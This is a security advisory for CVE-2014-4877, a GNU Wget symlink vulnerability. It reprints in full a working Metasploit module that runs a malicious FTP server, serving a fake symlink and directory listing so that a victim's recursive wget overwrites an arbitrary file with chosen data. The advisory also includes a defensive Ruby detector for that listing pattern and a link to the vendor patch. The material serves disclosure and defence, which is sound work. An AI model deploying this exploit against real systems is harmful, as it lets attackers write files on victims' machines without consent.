GNU Wget symbolic link Vulnerability (CVE-2014-4877)
Affected Systems:
GNU wget
Description:
Bugtraq id: 70751
CVE (CAN) ID: CVE-2014-4877
GNU Wget is a free software package used to retrieve files using HTTP, HTTPS, and FTP protocols.
GNU Wget has a symbolic link vulnerability. Attackers can exploit this vulnerability to access files outside the restricted directory, obtain sensitive information, and perform other attacks.
<* Source: vendor *>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::FtpServer
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'           => 'GNU Wget FTP Symlink Arbitrary Filesystem Access',
      'Description'    => %q{
        This module exploits a vulnerability in Wget when used in
        recursive (-r) mode with a FTP server as a destination. A
        symlink is used to allow arbitrary writes to the target's
        filesystem. To specify content for the file, use the
        "file:/path" syntax for the TARGET_DATA option.

        Tested successfully with wget 1.14. Versions prior to 1.16
        are presumed vulnerable.
      },
      'Author'         => ['hdm'],
      'License'        => MSF_LICENSE,
      'Actions'        => [['Service']],
      'PassiveActions' => ['Service'],
      'References'     =>
        [
          ['CVE', '2014-4877'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1139181'],
          ['URL', 'https://URLs']
        ],
      'DefaultAction'  => 'Service',
      'DisclosureDate' => 'Oct 27 2014'
    )

    register_options(
      [
        OptString.new('TARGET_FILE', [true, "The target file to overwrite", '/tmp/pwne']),
        OptString.new('TARGET_DATA', [true, "The data to write to the target file", 'Hello from Metasploit']),
        OptPort.new('SRVPORT', [true, "The port for the malicious FTP server to listen on", 2121])
      ], self.class)

    # Random name used for the symlink/directory pair in the listing
    @fakedir = Rex::Text.rand_text_alphanumeric(rand(8) + 8)
  end

  def run
    my_address = Rex::Socket.source_address
    print_good("Targets should run: $ wget -m ftp://#{my_address}:#{datastore['SRVPORT']}/")
    exploit()
  end

  def on_client_command_user(c, arg)
    @state[c][:user] = arg
    c.put "331 User name okay, need password...\r\n"
  end

  # Any credentials are accepted
  def on_client_command_pass(c, arg)
    @state[c][:pass] = arg
    c.put "230 Login OK\r\n"
    @state[c][:auth] = true
    print_status("#{@state[c][:name]} Logged in with user '#{@state[c][:user]}' and password '#{@state[c][:pass]}'...")
  end

  # RETR: serve TARGET_DATA for the file named after TARGET_FILE
  def on_client_command_retr(c, arg)
    print_status("#{@state[c][:name]} -> RETR #{arg}")

    if not @state[c][:auth]
      c.put "500 Access denied\r\n"
      return
    end

    unless arg.index(::File.basename(datastore['TARGET_FILE']))
      c.put "550 File does not exist\r\n"
      return
    end

    conn = establish_data_connection(c)
    if not conn
      c.put("425 Can't build data connection\r\n")
      return
    end

    c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
    conn.put(datastore['TARGET_DATA'])
    c.put("226 Transfer complete.\r\n")
    conn.close

    print_good("#{@state[c][:name]} Hopefully wrote #{datastore['TARGET_DATA'].length} bytes to #{datastore['TARGET_FILE']}")
  end

  # LIST: at the top level, list the same name twice, once as a symlink and
  # once as a directory; inside that directory, list the target file
  def on_client_command_list(c, arg)
    print_status("#{@state[c][:name]} -> LIST #{arg}")

    if not @state[c][:auth]
      c.put "500 Access denied\r\n"
      return
    end

    conn = establish_data_connection(c)
    if not conn
      c.put("425 Can't build data connection\r\n")
      return
    end

    pwd = @state[c][:cwd]
    buf = ''

    dstamp = Time.at(Time.now.to_i - ((3600 * 24 * 365) + (3600 * 24 * (rand(365) + 1)))).strftime("%b %e %Y")
    unless pwd.index(@fakedir)
      buf << "lrwxrwxrwx 1 root 33 #{dstamp} #{@fakedir} -> #{::File.dirname(datastore['TARGET_FILE'])}\r\n"
      buf << "drwxrwxr-x 15 root 4096 #{dstamp} #{@fakedir}\r\n"
    else
      buf << "-rwx------ 1 root #{"%9d" % datastore['TARGET_DATA'].length} #{dstamp} #{::File.basename(datastore['TARGET_FILE'])}\r\n"
    end

    c.put("150 Opening ASCII mode data connection for /bin/ls\r\n")
    conn.put("total #{buf.length}\r\n" + buf)
    c.put("226 Transfer complete.\r\n")
    conn.close
  end

  def on_client_command_size(c, arg)
    if not @state[c][:auth]
      c.put "500 Access denied\r\n"
      return
    end

    c.put("213 #{datastore['TARGET_DATA'].length}\r\n")
  end

  def on_client_command_cwd(c, arg)
    print_status("#{@state[c][:name]} -> CWD #{arg}")

    if not @state[c][:auth]
      c.put "500 Access denied\r\n"
      return
    end

    upath = "/"
    npath = ::File.join(@state[c][:cwd], arg)
    bpath = npath[upath.length, npath.length - upath.length]

    # Check for traversal above the root directory
    if not (npath[0, upath.length] == upath or bpath == '')
      bpath = '/'
    end

    bpath = '/' if bpath == ''
    @state[c][:cwd] = bpath

    c.put "250 CWD command successful.\r\n"
  end

end
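From the defender's side, the LIST response built by the module above has a recognizable shape: one name appears twice in the same listing, once as a symlink and once as a directory. The Ruby check below is an added example, not part of the original advisory or of Metasploit; the sample listings and the helper names (`parse_list`, `suspicious_names`) are constructed for illustration.

```ruby
# Added example: flag an FTP LIST response that names one entry both as a
# symlink and as a directory, the pattern the module's LIST handler emits.
Entry = Struct.new(:type, :name, :target)

# One Unix-style `ls -l` line: mode, link count, owner/group/size columns,
# a date (month, day, year or hh:mm), then the name (plus "-> target").
LIST_LINE = /\A(?<mode>[-dlbcps][-rwxsStT]{9})\s+\d+\s+.*?\s
             [A-Z][a-z]{2}\s+\d{1,2}\s+(?:\d{4}|\d{1,2}:\d{2})\s+
             (?<rest>.+)\z/x

def parse_list(listing)
  listing.each_line.map do |raw|
    m = LIST_LINE.match(raw.chomp)
    next unless m # skips "total N" and anything that is not an entry
    type = { 'l' => :symlink, 'd' => :dir }.fetch(m[:mode][0], :file)
    name, target = (type == :symlink ? m[:rest].split(' -> ', 2) : [m[:rest], nil])
    Entry.new(type, name, target)
  end.compact
end

# Returns one hash per name listed as both symlink and directory.
# :escapes is true when the link target is absolute or contains "..".
def suspicious_names(listing)
  parse_list(listing).group_by(&:name).map do |name, entries|
    link = entries.find { |e| e.type == :symlink }
    next unless link && entries.any? { |e| e.type == :dir }
    target = link.target.to_s
    outside = target.start_with?('/') || target.split('/').include?('..')
    { name: name, target: target, escapes: outside }
  end.compact
end

# Constructed sample modelled on the module's LIST output (name is made up).
MALICIOUS_LISTING =
  "total 155\r\n" \
  "lrwxrwxrwx   1 root     root           33 Mar  4  2014 Xk3f9QaLm2Z -> /tmp\r\n" \
  "drwxrwxr-x  15 root     root         4096 Mar  4  2014 Xk3f9QaLm2Z\r\n"

# Constructed benign listing: a symlink and a directory with different names.
BENIGN_LISTING =
  "total 8\r\n" \
  "lrwxrwxrwx   1 ftp      ftp             6 Jan 12 09:30 latest -> v1.2.3\r\n" \
  "drwxr-xr-x   2 ftp      ftp          4096 Jan 12 09:30 v1.2.3\r\n"

puts suspicious_names(MALICIOUS_LISTING).inspect if __FILE__ == $PROGRAM_NAME
```

The same check can be run over LIST responses extracted from a packet capture or an FTP proxy log for hosts that mirror FTP sites with a wget older than 1.16.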
Suggestion:
Vendor patch:
GNU
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://git.savannah.gnu.org/cgit/wget.git/commit?id=18b0979357ed7dc4e11d4f2b1d7e0f5932d82aa7